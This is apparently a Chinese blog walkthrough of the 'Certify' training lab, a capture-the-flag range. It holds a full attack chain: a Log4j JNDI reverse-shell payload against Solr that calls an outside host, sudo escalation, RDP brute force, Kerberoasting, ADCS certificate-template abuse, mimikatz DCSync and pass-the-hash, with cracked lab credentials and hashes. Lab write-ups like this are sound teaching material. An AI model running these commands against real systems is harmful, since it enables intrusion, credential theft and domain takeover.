春秋云境-Certify

发布于 2023-01-20  562 次阅读


简介:

Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。

挑战开始:

flag01:

首先还是先扫描下端口

nmap -sC -sV -p 1-65535 47.92.120.224

扫描的太慢了,还是fscan先探测下

可以发现开放了3个端口
访问80端口
可以发现是个Nginx的默认页面

访问8983端口,发现是solr
solr常见的漏洞是任意文件读取和log4j,这里看到他存在log4j组件,所以先看看存不存在log4j

触发点是action参数

/solr/admin/collections?action=

尝试验证:

http://47.92.120.224:8983/solr/admin/collections?action=${jndi:ldap://iszpua.dnslog.cn}

成功收到请求

证明存在log4j漏洞
开始利用
首先先下载JNDIExploit
https://github.com/WhiteHSBG/JNDIExploit
接着在服务器上开启ldap服务

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 162.14.xxx.xxx

同时nc做好监听

接着发出请求

http://47.92.120.224:8983/solr/admin/collections?action=${jndi:ldap://162.14.xxx.xxx:1389/Basic/ReverseShell/162.14.xxx.xxx/1234}

这时候就会收到shell

这时候还需要提权
先sudo -l查看下
这里发现grc可以免密sudo执行

查询下提权

直接利用

成功提权
成功找到第一个flag

flag02:

攻击机先开启http服务,下载frp和fscan到solr服务器上

做好隧道,扫描下内网

./fscan -h 172.22.9.1/24 -pa 3389

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.13     is alive
(icmp) Target 172.22.9.26     is alive
(icmp) Target 172.22.9.47     is alive
[*] Icmp alive hosts len is: 5
172.22.9.7:445 open
172.22.9.13:445 open
172.22.9.26:445 open
172.22.9.47:139 open
172.22.9.7:139 open
172.22.9.13:139 open
172.22.9.26:139 open
172.22.9.7:88 open
172.22.9.7:135 open
172.22.9.13:135 open
172.22.9.26:135 open
172.22.9.47:80 open
172.22.9.26:80 open
172.22.9.19:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.47:445 open
172.22.9.13:3389 open
172.22.9.7:3389 open
172.22.9.26:3389 open
172.22.9.19:8983 open
[*] alive ports len is: 22
start vulscan
[*] WebTitle: http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] NetBios: 172.22.9.7      [+]DC XIAORANG\XIAORANG-DC
[*] NetBios: 172.22.9.26     XIAORANG\DESKTOP-CBKTVMO
[*] NetInfo:
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] NetBios: 172.22.9.13     XIAORANG\CA01
[*] NetInfo:
[*]172.22.9.13
   [->]CA01
   [->]172.22.9.13
[*] NetInfo:
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] WebTitle: http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.47     fileserver                          Windows 6.1
[*] 172.22.9.47  (Windows 6.1)
[*] WebTitle: http://172.22.9.26        code:200 len:703    title:IIS Windows Server

这里可以分析一下内网环境
172.22.9.7 DC域控
172.22.9.13 CA域成员机
172.22.9.19 solr服务器
172.22.9.26 域成员机
172.22.9.47 文件服务器

看了下其他几个web,都是一些默认界面,所以暂时先不看web
有三台机器开了445,这里面正好有文件服务器,所以先看下172.22.9.47这个机器

proxychains4 smbclient -L 172.22.9.47

可以发现成功连接

查看共享文件

proxychains4 smbclient //172.22.9.47/fileshare

成功找到第二个flag


flag03:

刚刚从数据库里面下载了几个文件,先看看db
member表

users表

这里有几个用户名被修改成*了
因为都是些个人的账号密码,尝试爆破3389
这里有三台机器开了3389,域控算了,CA服务器也算了,这里最有可能的是26这台机器,因为这机器名一看就像个人机器
这里先制作两个字典,用户名字典用member表里面的用户名,密码字典用user表里面的密码
尝试使用hydra爆破

proxychains4 hydra -L user.txt -P pass.txt 172.22.9.26 rdp

这里成功爆破出几个账号

zhangjian--i9XDE02pLVf
liupeng--fiAzGwEMgTY

尝试RDP,但是没有登陆成功

根据flag2里面的提示SPN
在内网中,SPN 扫描通过查询向域控服务器执行服务发现。这对于红队而言,可以帮助他们识别正在运行着重要服务的主机,如终端,交换机等。SPN 的识别与发现是 kerberoasting 攻击的第一步。
SPN 分为两种类型:
一种是注册在活动目录的机器帐户(Computers)下。当一个服务的权限为 Local System 或 Network Service 时,则 SPN 注册在机器帐户(Computers)下。另一种是注册在活动目录的域用户帐户(Users)下,当一个服务的权限为一个域用户时,则 SPN 注册在域用户帐户(Users)下。

这里先尝试查找下域用户下的spn
这里用到impacket

proxychains4 python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

这里有个注意点,要把XIAORANG.LAB配置进hosts里面

把凭证保存在txt中,尝试hashcat破解
看了下hash类型,符合13100

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

成功跑出密码

这时候我们又多了一个凭证
zhangxia--MyPass2@@6
尝试RDP登陆
成功登陆26这台机器

但是权限不够无法访问其他用户文件夹
这时重新看看内网还有那些机器
172.22.9.13 CA域成员机
存在一台证书颁发服务器
域渗透中和证书服务器相关的利用有ESC1和ESC8
先检查有没证书配置错误
https://github.com/GhostPack/Certify

CertifyKit.exe find /vulnerable

C:\Users\zhangxia\Desktop>CertifyKit.exe find /vulnerable
CertifyKit (Hagrid29 version of Certify)
More info: https://github.com/Hagrid29/CertifyKit/

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-CA01-CA'

    Enterprise CA Name            : xiaorang-CA01-CA
    DNS Hostname                  : CA01.xiaorang.lab
    FullName                      : CA01.xiaorang.lab\xiaorang-CA01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=xiaorang-CA01-CA, DC=xiaorang, DC=lab
    Cert Thumbprint               : E50DC31FF6B0BA683078A2019BC11EA68D8EDE9F
    Cert Serial                   : 63C71D005A6E478D440D21CFC707855A
    Cert Start Date               : 2022/7/13 12:23:11
    Cert End Date                 : 2027/7/13 12:33:10
    Cert Chain                    : CN=xiaorang-CA01-CA,DC=xiaorang,DC=lab
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
      Allow  ManageCA, ManageCertificates               XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : CA01.xiaorang.lab\xiaorang-CA01-CA
    Template Name                         : XR Manager
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 安全电子邮件, 加密文件系统, 客户端身份验证
    mspki-certificate-application-policy  : 安全电子邮件, 加密文件系统, 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Domain Computers     S-1-5-21-2318488573-3353402606-1029629362-515
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\wangbin              S-1-5-21-2318488573-3353402606-1029629362-1171
                                      XIAORANG\zhangrui             S-1-5-21-2318488573-3353402606-1029629362-1157
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
        AutoEnrollment Rights       : XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186

    CA Name                               : CA01.xiaorang.lab\xiaorang-CA01-CA
    Template Name                         : XR Machine
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 服务器身份验证, 客户端身份验证
    mspki-certificate-application-policy  : 服务器身份验证, 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Domain Computers     S-1-5-21-2318488573-3353402606-1029629362-515
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
                                      XIAORANG\zhangxia             S-1-5-21-2318488573-3353402606-1029629362-1186
        AutoEnrollment Rights       : XIAORANG\chenchen             S-1-5-21-2318488573-3353402606-1029629362-1128
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
        WriteDacl Principals        : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519
        WriteProperty Principals    : XIAORANG\Administrator        S-1-5-21-2318488573-3353402606-1029629362-500
                                      XIAORANG\Domain Admins        S-1-5-21-2318488573-3353402606-1029629362-512
                                      XIAORANG\Enterprise Admins    S-1-5-21-2318488573-3353402606-1029629362-519

这里要成功利用要满足三个点
1、我们需要有权限去获取证书
2、能够登记为客户端身份验证或智能卡登录等
3、CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT开启
这里可以发现三点都满足

接着我们开始为域管申请证书

CertifyKit.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:XIAORANG.LAB\Administrator

然后换算pem到pfx,不要输入密码

接着请求票据

Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

接着DCsync

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" "exit" > 1.txt

成功获取域管hash

最后直接Crackmapexec哈希传递

proxychains4 python3 crackmapexec.py smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag04:

使用wmiexec成功获取第四个flag

proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7


届ける言葉を今は育ててる
最后更新于 2023-01-20